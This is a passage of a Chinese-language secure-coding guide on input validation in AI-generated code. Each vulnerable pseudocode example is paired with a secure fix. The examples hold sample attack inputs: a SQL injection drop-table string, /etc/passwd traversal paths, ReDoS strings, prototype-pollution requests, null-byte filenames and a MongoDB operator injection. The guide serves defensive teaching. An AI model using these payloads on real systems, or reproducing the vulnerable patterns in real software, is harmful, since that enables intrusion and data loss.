加密密钥为 256 位，且具有适当的随机性。
源代码中没有硬编码的键
使用 HKDF、PBKDF2（600k+ 次迭代）或 Argon2 派生的密钥
为不同的加密操作生成不同的密钥
已实施关键轮换机制
存储在 KMS、HSM 中的密钥，或静态加密的密钥
所有秘密比较均采用时序安全的比较方法
使用 HMAC 代替哈希（密钥+消息）
错误信息不会透露加密细节（例如填充有效性等）。
不使用任何自定义加密算法——只使用经过验证的标准基本算法。

模式 6：输入验证和数据清理

CWE 参考： CWE-20（输入验证不当）、CWE-1286（输入语法正确性验证不当）、CWE-185（正则表达式错误）、CWE-1333（正则表达式复杂度过高）、CWE-129（数组索引验证不当）

优先级评分： 21（频率：9，严重性：7，可检测性：5）

引言：人工智能经常忽略的基础

输入验证是抵御几乎所有注入攻击、数据损坏和应用程序崩溃的第一道防线。然而，人工智能生成的代码却常常未能实现适当的验证，要么将其视为事后考虑，要么干脆忽略。

为什么人工智能模型会跳过或失败输入验证：

训练数据侧重于“正常路径”：大多数教程代码、文档示例和 Stack Overflow 回答都演示了在预期输入下的功能。为了简洁起见，验证代码通常被省略，这使得人工智能认为验证是可选的。
验证具有上下文相关性：正确的验证取决于业务规则、数据类型和下游用途——而人工智能往往缺乏这些上下文信息。模型无法知道“姓名”字段不应超过 100 个字符，或者“年龄”必须介于 0 到 150 之间。
客户端验证看似完成：人工智能训练数据通常包含客户端表单验证（JavaScript）。模型学习了这些模式，但未能理解服务器端验证才是真正的安全边界。
正则表达式复杂度：人工智能生成的复杂正则表达式模式可能容易受到灾难性回溯攻击（ReDoS）或遗漏极端情况。该模型优化的是匹配预期模式，而不是拒绝恶意模式。
信任边界混乱：人工智能本身并不了解哪些数据源是可信的。它可能会验证用户表单输入，但也会信任来自内部API、数据库或消息队列的数据，而这些数据也可能已被攻破。
类型系统过度自信：在类型化语言中，人工智能可能会认为类型声明就足以进行验证，从而忽略了范围检查、格式验证和语义约束的必要性。

为什么这很重要——所有注入攻击的基础：

所有主要漏洞类别都源于输入验证不足：

SQL注入：查询中存在未经验证的输入
命令注入： shell 命令中存在未经验证的输入
XSS：未经验证的输入在 HTML 中呈现
路径遍历：未验证的文件路径
反序列化攻击：未经验证的序列化对象
缓冲区溢出：未验证的输入长度
业务逻辑绕过：未经验证的业务约束

影响统计数据：

CWE-20（输入验证不当）在 OWASP Top 10 中被列为多个漏洞的根本原因。
42%的SQL注入漏洞可追溯到缺少输入验证（NIST NVD分析）
npm 包中的 ReDoS 漏洞同比增长 143%（Snyk 2024）
67% 的 AI 生成的验证代码仅在客户端进行验证（2025 年安全研究）

反面例子：不同的表现形式

错误示例 1：仅客户端验证

// VULNERABLE: All validation in frontend, server trusts everything

// Frontend validation (JavaScript)
function validateForm(form):
    if form.email is empty:
        showError("Email required")
        return false

    if not isValidEmail(form.email):
        showError("Invalid email format")
        return false

    if form.password.length < 8:
        showError("Password must be 8+ characters")
        return false

    if form.age < 0 or form.age > 150:
        showError("Invalid age")
        return false

    // Form is "valid", submit to server
    return true

// Backend endpoint (VULNERABLE - no validation)
function handleRegistration(request):
    // AI assumes frontend validated, so just use the data
    email = request.body.email      // Could be anything
    password = request.body.password // Could be empty
    age = request.body.age          // Could be -1 or 9999999

    // Directly store in database
    query = "INSERT INTO users (email, password, age) VALUES (?, ?, ?)"
    database.execute(query, [email, hashPassword(password), age])

    return {"success": true}

为什么这样做很危险：

攻击者通过发送直接 HTTP 请求（curl、Postman、脚本）绕过 JavaScript。
浏览器开发者工具允许在提交前修改表单数据。
服务器接收任意数据，没有任何保护措施。
数据完整性问题会在整个应用程序中蔓延。
如果查询构造在其他地方存在漏洞，SQL注入仍然可能被利用。

攻击场景：

// Attacker sends directly to API:
POST /api/register
Content-Type: application/json

{
    "email": "'; DROP TABLE users; --",
    "password": "",
    "age": -9999999999
}

错误示例 2：部分验证（类型验证但范围验证不合格）

// VULNERABLE: Validates type exists, ignores business constraints

function processPayment(request):
    // Type checking only
    if typeof(request.amount) != "number":
        return error("Amount must be a number")

    if typeof(request.quantity) != "integer":
        return error("Quantity must be an integer")

    // MISSING: Range validation
    // amount could be negative (refund attack)
    // quantity could be 0 or MAX_INT (business logic bypass)

    total = request.amount * request.quantity
    chargeCustomer(request.customerId, total)

    return {"charged": total}

// Attacker exploits:
{
    "amount": -100.00,      // Negative = credit instead of charge
    "quantity": 999999999,  // Integer overflow potential
    "customerId": "12345"
}

为什么这样做很危险：

类型验证是必要的，但还不够。
业务逻辑取决于合理的范围。
整数溢出可能会溢出到意外值。
负值可能会逆转预期行为
零值可能导致支付失败或造成除法错误

错误示例 3：没有锚点的正则表达式

// VULNERABLE: Regex matches substring, not entire input

// Email validation without anchors
EMAIL_PATTERN = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}"

function validateEmail(email):
    if regex.match(EMAIL_PATTERN, email):
        return true
    return false

// This PASSES validation:
validateEmail("MALICIOUS_PAYLOAD user@example.com MALICIOUS_PAYLOAD")
// Because "user@example.com" matches somewhere in the string

// Filename validation without anchors
SAFE_FILENAME = "[a-zA-Z0-9_-]+"

function validateFilename(filename):
    if regex.match(SAFE_FILENAME, filename):
        return true
    return false

// This PASSES validation:
validateFilename("../../../etc/passwd")
// Because "etc" matches the pattern somewhere in the string

为什么这样做很危险：

正则表达式匹配字符串中的任意位置，而不是整个输入。
注入有效载荷可以包围或先于有效模式
路径遍历绕过了文件名验证
电子邮件字段可能包含围绕有效地址的 XSS 有效载荷。
常见于人工智能生成的代码中，该代码会复制没有锚点的正则表达式模式。

修复预览：

// SECURE: Use ^ and $ anchors to match entire input
EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$"
SAFE_FILENAME = "^[a-zA-Z0-9_-]+$"

不良示例 4：ReDoS 攻击漏洞模式

// VULNERABLE: Catastrophic backtracking regex patterns

// Email validation with ReDoS vulnerability
// Pattern: nested quantifiers with overlapping character classes
VULNERABLE_EMAIL = "^([a-zA-Z0-9]+)*@[a-zA-Z0-9]+\.[a-zA-Z]+$"

// Attack input: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
// The regex engine backtracks exponentially trying all combinations

// URL validation with ReDoS
VULNERABLE_URL = "^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$"

// Attack input: long string of valid URL characters followed by invalid character
// "http://example.com/" + "a" * 30 + "!"

// Naive duplicate word finder (common tutorial example)
DUPLICATE_WORDS = "\b(\w+)\s+\1\b"
// Can hang on: "word word word word word word word word word word!"

function validateInput(input, pattern):
    // This can hang for minutes or crash the server
    return regex.match(pattern, input)

为什么这样做很危险：

单个恶意请求即可占用 100% 的 CPU 资源长达数分钟。
无需多次请求即可拒绝服务
人工智能照搬教程中的这些模式，却不理解其复杂性。
嵌套量词“ (a+)+, (a*)*”(a?)*是危险信号。
角色类别重叠会加剧这个问题。

ReDoS 复杂性分析：

// Pattern: (a+)+$
// Input: "aaaaaaaaaaaaaaaaaaaaaaaaX"
//
// For 25 'a's followed by 'X':
// - The engine tries every possible way to split the 'a's between groups
// - Time complexity: O(2^n) where n is input length
// - 25 chars = 33 million+ combinations to try
// - 30 chars = 1 billion+ combinations

错误示例 5：缺少空值/未定义检查

// VULNERABLE: Assumes data structure completeness

function processUserProfile(user):
    // No null checks - any missing field crashes
    fullName = user.firstName + " " + user.lastName  // Crash if null

    emailDomain = user.email.split("@")[1]  // Crash if email is null

    age = parseInt(user.profile.age)  // Crash if profile is null

    // Process address (deeply nested)
    city = user.profile.address.city.toUpperCase()  // Multiple crash points

    return {
        "name": fullName,
        "domain": emailDomain,
        "age": age,
        "city": city
    }

// API returns partial data:
{
    "firstName": "John",
    "lastName": null,           // Could be null
    "email": null,              // Could be missing
    "profile": {
        "age": "25"
        // address is missing entirely
    }
}

为什么这样做很危险：

应用程序崩溃会将错误信息暴露给攻击者。
空指针异常可能会泄露堆栈跟踪信息。
来自 API、数据库或用户输入的部分数据很常见
人工智能假设训练数据结构始终是完整的。
当一个字段为空时，会发生级联故障。

错误示例 6：信任用户输入的数组索引

// VULNERABLE: Using user input directly as array index

function getItemByIndex(request):
    items = ["item0", "item1", "item2", "item3", "item4"]
    index = request.params.index  // User-provided

    // No validation - trusts user to provide valid index
    return items[index]  // Out of bounds or negative index

// Worse: Array index used for data access
function getUserData(request):
    userIndex = parseInt(request.params.id)

    // Could access negative index, other users' data, or crash
    return allUsersData[userIndex]

// Object property access from user input
function getConfigValue(request):
    configKey = request.params.key

    // Prototype pollution or access to __proto__, constructor
    return config[configKey]

为什么这样做很危险：

在某些语言中，负索引会循环到数组末尾。
越界访问会导致程序崩溃或返回未定义行为
整数溢出可能会产生意想不到的索引。
对象属性访问允许原型污染
__proto__，，键constructor可以prototype修改对象行为

攻击场景：

// Array out of bounds:
GET /items?index=99999999
GET /items?index=-1

// Prototype pollution via property access:
GET /config?key=__proto__
GET /config?key=constructor
POST /config {"key": "__proto__", "value": {"isAdmin": true}}

优秀范例：正确的模式

优秀示例 1：服务器端验证模式

// SECURE: Comprehensive server-side validation with clear error messages

function handleRegistration(request):
    errors = []

    // Email validation
    email = request.body.email
    if email is null or email is empty:
        errors.append({"field": "email", "message": "Email is required"})
    else if length(email) > 254:  // RFC 5321 limit
        errors.append({"field": "email", "message": "Email too long"})
    else if not isValidEmailFormat(email):
        errors.append({"field": "email", "message": "Invalid email format"})
    else if not isAllowedEmailDomain(email):  // Business rule
        errors.append({"field": "email", "message": "Email domain not allowed"})

    // Password validation
    password = request.body.password
    if password is null or password is empty:
        errors.append({"field": "password", "message": "Password is required"})
    else if length(password) < 12:
        errors.append({"field": "password", "message": "Password must be 12+ characters"})
    else if length(password) > 128:  // Prevent DoS via bcrypt
        errors.append({"field": "password", "message": "Password too long"})
    else if not meetsComplexityRequirements(password):
        errors.append({"field": "password", "message": "Password too weak"})

    // Age validation (integer with business range)
    age = request.body.age
    if age is null:
        errors.append({"field": "age", "message": "Age is required"})
    else if typeof(age) != "integer":
        errors.append({"field": "age", "message": "Age must be a whole number"})
    else if age < 13:  // Business rule: minimum age
        errors.append({"field": "age", "message": "Must be at least 13 years old"})
    else if age > 150:  // Sanity check
        errors.append({"field": "age", "message": "Invalid age"})

    // Return all errors at once (better UX than one at a time)
    if errors.length > 0:
        return {"success": false, "errors": errors}

    // Only process after validation passes
    hashedPassword = hashPassword(password)
    createUser(email, hashedPassword, age)
    return {"success": true}

为什么说它是安全的：

每个字段在使用前都经过验证。
类型、格式、长度和业务规则均已检查
清晰、具体的错误信息，便于调试
已收集所有错误（提升用户体验）
合理的上限可以防止拒绝服务攻击。
验证在服务器端进行，客户端无法绕过。

优秀示例 2：模式验证方法

// SECURE: Declarative schema validation with robust library

// Define schema once, reuse everywhere
USER_REGISTRATION_SCHEMA = {
    "type": "object",
    "required": ["email", "password", "age", "name"],
    "additionalProperties": false,  // Reject unknown fields
    "properties": {
        "email": {
            "type": "string",
            "format": "email",
            "maxLength": 254
        },
        "password": {
            "type": "string",
            "minLength": 12,
            "maxLength": 128
        },
        "age": {
            "type": "integer",
            "minimum": 13,
            "maximum": 150
        },
        "name": {
            "type": "object",
            "required": ["first", "last"],
            "properties": {
                "first": {
                    "type": "string",
                    "minLength": 1,
                    "maxLength": 100,
                    "pattern": "^[\\p{L}\\s'-]+$"  // Unicode letters, spaces, hyphens, apostrophes
                },
                "last": {
                    "type": "string",
                    "minLength": 1,
                    "maxLength": 100,
                    "pattern": "^[\\p{L}\\s'-]+$"
                }
            }
        }
    }
}

function handleRegistration(request):
    // Validate entire payload against schema
    validationResult = schemaValidator.validate(request.body, USER_REGISTRATION_SCHEMA)

    if not validationResult.valid:
        return {
            "success": false,
            "errors": validationResult.errors  // Detailed error per field
        }

    // Data is guaranteed to match schema structure and constraints
    processRegistration(request.body)
    return {"success": true}

// Additional business logic validation after schema validation
function processRegistration(data):
    // Schema ensures structure; now check business rules
    if isEmailAlreadyRegistered(data.email):
        throw ValidationError("Email already registered")

    if isCommonPassword(data.password):
        throw ValidationError("Password is too common")

    createUser(data)

为什么说它是安全的：

模式是声明式的，易于审计
additionalProperties: false防止意外数据注入
库以一致的方式处理类型强制转换。
Unicode 感知的国际名称模式
内置嵌套对象验证
结构验证与业务规则的分离

优秀示例 3：安全的正则表达式模式

// SECURE: Anchored, bounded, and ReDoS-resistant patterns

// Email validation - anchored and bounded
// Note: Perfect email validation is complex; often better to just check format
// and verify via confirmation email
EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]{1,64}@[a-zA-Z0-9.-]{1,253}\\.[a-zA-Z]{2,63}$"

// Safe filename - anchored, limited character set, bounded length
FILENAME_PATTERN = "^[a-zA-Z0-9][a-zA-Z0-9._-]{0,254}$"

// Safe identifier (alphanumeric + underscore, starts with letter)
IDENTIFIER_PATTERN = "^[a-zA-Z][a-zA-Z0-9_]{0,63}$"

// URL path segment - no special characters
PATH_SEGMENT_PATTERN = "^[a-zA-Z0-9._-]{1,255}$"

function validateWithSafeRegex(input, pattern, maxLength):
    // Length check BEFORE regex (prevents ReDoS)
    if input is null or length(input) > maxLength:
        return false

    // Use timeout-protected regex matching if available
    try:
        return regexMatchWithTimeout(pattern, input, timeout = 100ms)
    catch TimeoutException:
        logWarning("Regex timeout on input: " + truncate(input, 50))
        return false

// For complex patterns, use atomic groups or possessive quantifiers
// (syntax varies by regex engine)

// VULNERABLE: (a+)+
// SAFE: (?>a+)+ (atomic group - no backtracking into group)
// SAFE: a++ (possessive quantifier - never backtracks)

// Alternative: Linear-time regex engines (RE2, rust regex)
// These reject patterns that could have exponential complexity
function validateWithLinearRegex(input, pattern):
    // RE2 guarantees O(n) matching time
    return RE2.match(pattern, input)

为什么说它是安全的：

所有模式均以……为^锚点$
长度有限制，以防止长输入攻击
角色职业之间没有重叠（没有[a-zA-Z0-9]+相邻关系[a-z]+）。
没有可能导致回溯的嵌套量词
超时保护作为纵深防御手段
可选择使用线性时间正则表达式引擎

优秀示例 4：类型强制处理

// SECURE: Explicit type handling with safe coercion

function parseIntegerSafe(value, min, max):
    // Handle null/undefined
    if value is null or value is undefined:
        return {valid: false, error: "Value is required"}

    // If already integer, validate range
    if typeof(value) == "integer":
        if value < min or value > max:
            return {valid: false, error: "Value out of range: " + min + "-" + max}
        return {valid: true, value: value}

    // If string, parse carefully
    if typeof(value) == "string":
        // Check for valid integer string (no floats, no hex, no scientific)
        if not regex.match("^-?[0-9]+$", value):
            return {valid: false, error: "Invalid integer format"}

        parsed = parseInt(value, 10)  // Always specify radix

        // Check for NaN (parsing failure)
        if isNaN(parsed):
            return {valid: false, error: "Could not parse integer"}

        // Check for overflow
        if parsed < MIN_SAFE_INTEGER or parsed > MAX_SAFE_INTEGER:
            return {valid: false, error: "Integer overflow"}

        // Range check
        if parsed < min or parsed > max:
            return {valid: false, error: "Value out of range: " + min + "-" + max}

        return {valid: true, value: parsed}

    // Reject all other types
    return {valid: false, error: "Expected integer, got " + typeof(value)}

// Usage
function handlePayment(request):
    amountResult = parseIntegerSafe(request.body.amount, 1, 1000000)  // 1 cent to $10,000
    if not amountResult.valid:
        return error("amount: " + amountResult.error)

    quantityResult = parseIntegerSafe(request.body.quantity, 1, 100)
    if not quantityResult.valid:
        return error("quantity: " + quantityResult.error)

    // Safe to use validated integers
    total = amountResult.value * quantityResult.value
    processPayment(total)

为什么说它是安全的：

显式处理 null/undefined
操作前进行类型检查
使用基数进行安全的字符串到整数解析
检查平台限制的溢出情况
业务约束的范围验证
针对每种故障模式给出清晰的错误信息

优秀示例 5：白名单验证

// SECURE: Allowlist approach - only accept known-good values

// For enum-like fields, use explicit allowlist
ALLOWED_COUNTRIES = ["US", "CA", "GB", "DE", "FR", "JP", "AU"]
ALLOWED_ROLES = ["user", "moderator", "admin"]
ALLOWED_SORT_FIELDS = ["name", "date", "price", "rating"]
ALLOWED_FILE_EXTENSIONS = [".jpg", ".jpeg", ".png", ".gif", ".pdf"]

function validateCountry(input):
    // Case-insensitive comparison against allowlist
    normalized = input.toUpperCase().trim()
    if normalized in ALLOWED_COUNTRIES:
        return {valid: true, value: normalized}
    return {valid: false, error: "Invalid country code"}

function validateSortField(input):
    // Exact match required
    if input in ALLOWED_SORT_FIELDS:
        return {valid: true, value: input}
    return {valid: false, error: "Invalid sort field"}

function validateFileUpload(filename, content):
    // Extension whitelist
    extension = getExtension(filename).toLowerCase()
    if extension not in ALLOWED_FILE_EXTENSIONS:
        return {valid: false, error: "File type not allowed"}

    // ALSO validate content type (magic bytes)
    detectedType = detectFileType(content)
    if detectedType.extension != extension:
        return {valid: false, error: "File content doesn't match extension"}

    // Additional: check file isn't actually executable or contains script
    if containsExecutableContent(content):
        return {valid: false, error: "File contains disallowed content"}

    return {valid: true}

// For SQL column/table names (cannot be parameterized)
function validateColumnName(input, allowedColumns):
    if input in allowedColumns:
        return input  // Safe to use in query
    throw ValidationError("Invalid column name")

// Usage in query
function searchProducts(filters):
    sortField = validateColumnName(filters.sortBy, ["name", "price", "created_at"])
    sortOrder = filters.order == "desc" ? "DESC" : "ASC"  // Binary choice

    // Now safe to interpolate (they're from allowlist)
    query = "SELECT * FROM products ORDER BY " + sortField + " " + sortOrder
    return database.query(query)

为什么说它是安全的：

只接受预先批准的值
没有正则表达式复杂性或绕过潜力
清晰、可审计的允许值列表
需求变化时易于更新
文件验证会检查文件扩展名和内容。
根据显式列表验证 SQL 标识符

优秀示例 6：验证前的规范化

// SECURE: Normalize input before validation to prevent bypass

function validatePath(input):
    // Step 1: Reject null bytes (used to bypass filters)
    if contains(input, "\x00"):
        return {valid: false, error: "Invalid character in path"}

    // Step 2: Decode URL encoding (multiple rounds to catch double-encoding)
    decoded = input
    for i in range(3):  // Max 3 rounds of decoding
        newDecoded = urlDecode(decoded)
        if newDecoded == decoded:
            break  // No more encoding to decode
        decoded = newDecoded

    // Step 3: Normalize path separators
    normalized = decoded.replace("\\", "/")

    // Step 4: Resolve path (remove . and ..)
    resolved = resolvePath(normalized)

    // Step 5: Check against allowed base directory
    allowedBase = "/var/www/uploads/"
    if not resolved.startsWith(allowedBase):
        return {valid: false, error: "Path traversal detected"}

    // Step 6: Check for remaining dangerous patterns
    if contains(resolved, ".."):
        return {valid: false, error: "Invalid path component"}

    return {valid: true, value: resolved}

function validateUsername(input):
    // Normalize Unicode before validation
    // NFC = Canonical Composition (combines characters)
    normalized = unicodeNormalize(input, "NFC")

    // Check for confusable characters (homoglyphs)
    if containsHomoglyphs(normalized):
        return {valid: false, error: "Username contains confusable characters"}

    // Now validate the normalized form
    if not regex.match("^[a-zA-Z0-9_]{3,20}$", normalized):
        return {valid: false, error: "Invalid username format"}

    return {valid: true, value: normalized}

function validateUrl(input):
    // Parse URL to get components
    parsed = parseUrl(input)

    if parsed is null:
        return {valid: false, error: "Invalid URL"}

    // Validate scheme (allowlist)
    if parsed.scheme not in ["http", "https"]:
        return {valid: false, error: "Only HTTP(S) URLs allowed"}

    // Check for IP addresses (may be SSRF target)
    if isIpAddress(parsed.host):
        return {valid: false, error: "IP addresses not allowed"}

    // Check for internal hostnames
    if parsed.host.endsWith(".internal") or parsed.host == "localhost":
        return {valid: false, error: "Internal URLs not allowed"}

    // Check for credentials in URL
    if parsed.username or parsed.password:
        return {valid: false, error: "Credentials in URL not allowed"}

    // Reconstruct URL from parsed components (normalizes encoding)
    canonicalUrl = buildUrl(parsed.scheme, parsed.host, parsed.port, parsed.path)

    return {valid: true, value: canonicalUrl}

为什么说它是安全的：

在验证之前解码多个编码层
路径规范化防止遍历/./或/../
Unicode规范化可防止同形字攻击
URL解析会在检查内容之前验证其结构。
URL 方案的允许列表可以阻止诸如此类的情况file://。javascript:
通过拒绝内部主机名和 IP 地址实现 SSRF 保护

边缘案例部分

特殊情况 1：Unicode 规范化问题

// DANGEROUS: Validating before normalization allows bypass

// Attack: Using decomposed Unicode characters
// "admin" can be represented as:
// - "admin" (5 ASCII characters)
// - "admin" with combining characters: "admin" + accent marks
// - Confusables: "αdmin" (Greek alpha), "аdmin" (Cyrillic a)

function vulnerableUsernameCheck(input):
    if input == "admin":
        return "Cannot register as admin"
    return "OK"

// Attacker uses: "аdmin" (Cyrillic 'а' looks like Latin 'a')
vulnerableUsernameCheck("аdmin")  // Returns "OK"
// But displays as "admin" in UI!

// SECURE: Normalize and check for confusables
function secureUsernameCheck(input):
    // Step 1: Unicode normalize to NFC
    normalized = unicodeNormalize(input, "NFC")

    // Step 2: Convert confusables to ASCII equivalent
    ascii = convertConfusablesToAscii(normalized)

    // Step 3: Check reserved names against ASCII version
    reservedNames = ["admin", "root", "system", "administrator", "support"]
    if ascii.toLowerCase() in reservedNames:
        return {valid: false, error: "Reserved username"}

    // Step 4: Only allow safe character set
    if not isAsciiAlphanumeric(input):
        return {valid: false, error: "Username must be ASCII letters and numbers"}

    return {valid: true, value: normalized}

检测：使用 Unicode 混淆字符（admin/root）、组合字符、零宽度字符进行测试。

极端情况 2：空字节注入

// DANGEROUS: Null bytes can truncate strings in some languages

// Filename validation bypass with null byte
filename = "malicious.php\x00.jpg"

// In C/PHP, strcmp might only see "malicious.php\x00"
// The ".jpg" is ignored
if filename.endsWith(".jpg"):
    uploadFile(filename)  // Allows .php upload!

// Path validation bypass
path = "/safe/directory/../../etc/passwd\x00/safe/suffix"
// Validation sees: ends with "/safe/suffix" - looks OK
// File system sees: "/etc/passwd"

// SECURE: Strip null bytes first
function sanitizeInput(input):
    // Remove null bytes entirely
    sanitized = input.replace("\x00", "")

    // Also remove other control characters
    sanitized = removeControlCharacters(sanitized)

    return sanitized

function validateFilename(input):
    sanitized = sanitizeInput(input)

    // Now validate
    if sanitized != input:
        return {valid: false, error: "Invalid characters in filename"}

    // Continue with extension validation
    // ...

检测：测试所有包含嵌入空字节（\x00，%00）的字符串输入。

特殊情况 3：类型混淆

// DANGEROUS: Loose type comparison leads to bypass

// JavaScript/PHP style loose comparison
function vulnerableAuth(password):
    storedHash = "0e123456789"  // Some MD5 hashes start with "0e"
    inputHash = md5(password)

    // In PHP: "0e123456789" == "0e987654321" is TRUE!
    // Both are interpreted as 0 * 10^(number) = 0
    if inputHash == storedHash:  // Loose comparison
        return "Authenticated"
    return "Failed"

// Type confusion with arrays
function vulnerablePasswordReset(token):
    // Expected: token = "abc123def456"
    // Attack: token = {"$gt": ""}  (MongoDB injection via type confusion)

    if database.findOne({"resetToken": token}):
        return "Token found"

// SECURE: Strict type checking
function secureAuth(password):
    storedHash = getStoredHash(user)
    inputHash = hashPassword(password)

    // Strict comparison and constant-time
    if typeof(inputHash) != "string" or typeof(storedHash) != "string":
        return "Failed"

    if not constantTimeEquals(inputHash, storedHash):
        return "Failed"

    return "Authenticated"

function securePasswordReset(token):
    // Enforce string type
    if typeof(token) != "string":
        return {valid: false, error: "Invalid token format"}

    // Validate format
    if not regex.match("^[a-f0-9]{64}$", token):
        return {valid: false, error: "Invalid token format"}

    // Now safe to query
    result = database.findOne({"resetToken": token})
    // ...

检测：测试不同类型的数据：数组、对象、数字、布尔值，预期结果为字符串。

特殊情况 4：验证过程中出现整数溢出

// DANGEROUS: Validation passes but computation overflows

function vulnerablePurchase(quantity, price):
    // Validate ranges
    if quantity < 0 or quantity > 1000000:
        return error("Invalid quantity")
    if price < 0 or price > 1000000:
        return error("Invalid price")

    // Both pass validation, but multiplication overflows!
    // quantity = 999999, price = 999999
    // total = 999998000001 (exceeds 32-bit integer)
    total = quantity * price  // OVERFLOW

    chargeCustomer(total)  // May wrap to negative or small number

// SECURE: Check for overflow in computation
function securePurchase(quantity, price):
    // Validate individual ranges
    if not isValidInteger(quantity, 1, 1000):
        return error("Invalid quantity")
    if not isValidInteger(price, 1, 10000000):  // in cents
        return error("Invalid price")

    // Check multiplication won't overflow
    MAX_SAFE_TOTAL = 2147483647  // 32-bit signed max

    if quantity > MAX_SAFE_TOTAL / price:
        return error("Order total too large")

    total = quantity * price  // Now safe

    // Additional business validation
    if total > MAX_ALLOWED_TRANSACTION:
        return error("Transaction exceeds limit")

    chargeCustomer(total)

// Alternative: Use arbitrary precision arithmetic for money
function securePurchaseWithDecimal(quantity, price):
    quantityDecimal = Decimal(quantity)
    priceDecimal = Decimal(price)

    total = quantityDecimal * priceDecimal  // No overflow

    if total > Decimal(MAX_ALLOWED_TRANSACTION):
        return error("Transaction exceeds limit")

    chargeCustomer(total)

检测：使用 MAX_INT、MAX_INT-1、边界值以及相乘导致溢出的组合进行测试。

常见错误部分

常见错误 1：验证格式化输出而非输入

// WRONG: Validate after formatting
function displayUserData(userId):
    userData = database.getUser(userId)  // Raw from DB

    // Format for display
    formattedName = formatName(userData.name)
    formattedBio = formatBio(userData.bio)

    // Validating AFTER format - too late!
    if containsHtml(formattedName):  // Already formatted/escaped
        return error("Invalid name")

    return template.render(formattedName, formattedBio)

// CORRECT: Validate at input, encode at output
function saveUserData(request):
    name = request.body.name
    bio = request.body.bio

    // Validate raw input BEFORE storing
    if not isValidName(name):
        return error("Invalid name")

    if containsDangerousPatterns(bio):
        return error("Invalid bio content")

    // Store validated (but not encoded) data
    database.saveUser({"name": name, "bio": bio})

function displayUserData(userId):
    userData = database.getUser(userId)

    // Encode for output context (don't validate again)
    return template.render({
        "name": htmlEncode(userData.name),
        "bio": htmlEncode(userData.bio)
    })

为什么这样做是错误的：

验证应该在输入边界进行，而不是在输出边界进行。
格式化/编码后的数据可能通过验证，但仍然很危险。
编码应在输出时进行，并根据上下文而定。
格式化后的验证纯属作秀。

常见错误 2：对二进制数据使用字符串操作

// WRONG: String operations on binary data
function processUploadedImage(fileContent):
    // Convert binary to string - CORRUPTS DATA
    contentString = fileContent.toString("utf-8")

    // String operations fail on binary
    if contentString.startsWith("\x89PNG"):  // May not work correctly
        processImage(contentString)  // Corrupted!

    // Regex on binary data is meaningless
    if regex.match("<script>", contentString):  // False sense of security
        return error("Invalid image")

// CORRECT: Use binary operations for binary data
function processUploadedImage(fileContent):
    // Keep as binary buffer
    buffer = fileContent  // Raw bytes

    // Check magic bytes using binary comparison
    PNG_MAGIC = bytes([0x89, 0x50, 0x4E, 0x47])  // \x89PNG
    JPEG_MAGIC = bytes([0xFF, 0xD8, 0xFF])

    if buffer.slice(0, 4) == PNG_MAGIC:
        imageType = "png"
    else if buffer.slice(0, 3) == JPEG_MAGIC:
        imageType = "jpeg"
    else:
        return error("Unsupported image format")

    // Use dedicated image library for validation
    try:
        image = imageLibrary.load(buffer)

        // Validate image properties
        if image.width > MAX_WIDTH or image.height > MAX_HEIGHT:
            return error("Image too large")

        // Re-encode image (strips any embedded code)
        cleanBuffer = imageLibrary.encode(image, imageType)
        return {valid: true, content: cleanBuffer}

    catch ImageError:
        return error("Invalid image file")

为什么这样做是错误的：

UTF-8 解码会用无效序列损坏二进制数据。
字符串操作假定文本编码不适用。
正则表达式无法有效匹配二进制模式
魔术字节检查应该使用二进制比较

常见错误三：不同端点验证不一致

// WRONG: Different validation in different places
// API Endpoint 1: Strict validation
function createUserApi(request):
    if not isValidEmail(request.email):
        return error("Invalid email")
    if not isStrongPassword(request.password):
        return error("Weak password")
    createUser(request.email, request.password)

// API Endpoint 2: No validation (developer forgot)
function createUserFromOAuth(oauthData):
    // Trust OAuth provider's email
    createUser(oauthData.email, generateRandomPassword())

// Internal function: Also no validation (assumes callers validated)
function createUserInternal(email, password):
    // Directly insert to database - SQL injection if email not validated upstream
    query = "INSERT INTO users (email, password) VALUES ('" + email + "', ?)"
    database.execute(query, [password])

// CORRECT: Centralized validation
class UserValidator:
    function validateEmail(email):
        if email is null or email is empty:
            throw ValidationError("Email required")
        if length(email) > 254:
            throw ValidationError("Email too long")
        if not regex.match(EMAIL_PATTERN, email):
            throw ValidationError("Invalid email format")
        return email.toLowerCase().trim()

    function validatePassword(password):
        // ... password validation
        return password

    function validateUserData(data):
        return {
            "email": this.validateEmail(data.email),
            "password": this.validatePassword(data.password)
        }

// Single creation function used by all endpoints
function createUser(data):
    validated = UserValidator.validateUserData(data)

    // Now safe to use parameterized query
    query = "INSERT INTO users (email, password) VALUES (?, ?)"
    database.execute(query, [validated.email, hashPassword(validated.password)])

// All endpoints use the same function
function createUserApi(request):
    createUser(request.body)

function createUserFromOAuth(oauthData):
    createUser({"email": oauthData.email, "password": generateRandomPassword()})

为什么这样做是错误的：

多条代码路径 = 多处容易忘记验证的地方
不同的验证规则会导致安全态势不一致。
内部函数不应信任已正确验证的调用者。
集中式验证确保了安全性的一致性

验证框架模式

模式 1：分层验证架构

// Layer 1: Transport-level validation (before application code)
// - Request size limits
// - Content-Type checking
// - Rate limiting
// Typically configured in web server/framework

// Layer 2: Schema validation (structure and types)
function validateSchema(data, schema):
    return schemaValidator.validate(data, schema)

// Layer 3: Format validation (syntax)
function validateFormats(data):
    errors = []
    if data.email and not isValidEmailFormat(data.email):
        errors.append("Invalid email format")
    if data.url and not isValidUrl(data.url):
        errors.append("Invalid URL format")
    return errors

// Layer 4: Business rule validation (semantics)
function validateBusinessRules(data, context):
    errors = []
    if data.endDate < data.startDate:
        errors.append("End date must be after start date")
    if data.quantity > context.inventory.available:
        errors.append("Insufficient inventory")
    return errors

// Orchestration
function validateRequest(request, schema, context):
    // Layer 2: Schema
    schemaResult = validateSchema(request.body, schema)
    if not schemaResult.valid:
        return {valid: false, errors: schemaResult.errors, layer: "schema"}

    // Layer 3: Format
    formatErrors = validateFormats(request.body)
    if formatErrors.length > 0:
        return {valid: false, errors: formatErrors, layer: "format"}

    // Layer 4: Business rules
    businessErrors = validateBusinessRules(request.body, context)
    if businessErrors.length > 0:
        return {valid: false, errors: businessErrors, layer: "business"}

    return {valid: true, data: request.body}

模式 2：带短路的验证流程

// Define validators as composable functions
validators = [
